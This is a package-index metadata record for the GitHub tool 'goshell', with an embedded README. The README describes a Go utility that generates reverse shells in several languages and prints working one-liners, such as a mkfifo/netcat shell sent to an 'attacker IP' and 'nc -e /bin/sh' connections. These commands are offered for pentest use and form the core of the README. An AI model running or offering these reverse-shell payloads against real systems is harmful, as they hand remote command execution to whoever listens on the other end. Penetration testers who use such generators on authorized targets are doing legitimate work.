{"id":19265819,"url":"https://github.com/eze-kiel/goshell","last_synced_at":"2026-04-18T04:02:16.893Z","repository":{"id":107697771,"uuid":"286209283","full_name":"eze-kiel/goshell","owner":"eze-kiel","description":"Generate reverse shells in command line with Go !","archived":false,"fork":false,"pushed_at":"2020-08-09T10:21:43.000Z","size":7,"stargazers_count":22,"open_issues_count":0,"forks_count":2,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-07-12T15:41:01.384Z","etag":null,"topics":["cli","go","golang","pentest","reverse-shell","revshell","shell"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/eze-kiel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-08-09T09:50:52.000Z","updated_at":"2025-05-09T23:34:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"f1510b78-87e2-4d01-9f0f-63ff253a8852","html_url":"https://github.com/eze-kiel/goshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/eze-kiel/goshell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/eze-kiel%2Fgoshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/eze-kiel%2Fgoshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/eze-kiel%2Fgoshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/eze-kiel%2Fgoshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/eze-kiel","download_url":"https://codeload.github.com/eze-kiel/goshell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/eze-kiel%2Fgoshell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31955919,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-18T00:39:45.007Z","status":"online","status_checked_at":"2026-04-18T02:00:07.018Z","response_time":103,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","go","golang","pentest","reverse-shell","revshell","shell"],"created_at":"2024-11-09T19:48:52.777Z","updated_at":"2026-04-18T04:02:16.866Z","avatar_url":"https://github.com/eze-kiel.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# GoShell\n[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com) [![forthebadge](https://forthebadge.com/images/badges/you-didnt-ask-for-this.svg)](https://forthebadge.com)\n\nGenerate reverse shells in command line.\n\n## Usage\nThis panel appears when typing `./goshell -h` :\n```\nUSAGE:\n   goshell [global options] command [command options] [arguments...]\n\nCOMMANDS:\n   bash     Generate a Bash reverse shell\n   nc       Generate NetCat reverse shells\n   perl     Generate Perl reverse shells\n   php      Generate a PHP reverse shell\n   python   Generate a Python reverse shell\n   ruby     Generate a Ruby reverse shell\n   telnet   Generate a telnet reverse shell\n   help, h  Shows a list of commands or help for one command\n\nCOMMAND OPTIONS:\n   --ip value    (default: \"127.0.0.1\")\n   --port value  (default: \"8080\")\n   --help, -h    show help (default: false)\n\nGLOBAL OPTIONS:\n   --help, -h  show help (default: false)\n```\n\n## Examples\nIt is possible to provide the attacker IP address and listening port with the flags `-ip` and `-port`.\n```\n\u003e ./goshell bash -ip 1.2.3.4 -port 1337                                                                                                            ~/dev/go/goshell\nGoShell - (c)2020 - ezekiel\nNote that those shells may not work on your target !\n\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 1.2.3.4 1337 \u003e/tmp/f\n\n\u003e ./goshell nc                                                                                                                                 ~/dev/go/goshell\nGoShell - (c)2020 - ezekiel\nNote that those shells may not work on your target !\n\n#1: nc -e /bin/sh 127.0.0.1 8080\n#2: /bin/sh | nc 127.0.0.1 8080\n#3: rm -f /tmp/p; mknod /tmp/p p \u0026\u0026 nc 127.0.0.1 8080 0/tmp/p\n```\n\n## Sources\n* [highon.coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)\n* [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feze-kiel%2Fgoshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feze-kiel%2Fgoshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feze-kiel%2Fgoshell/lists"}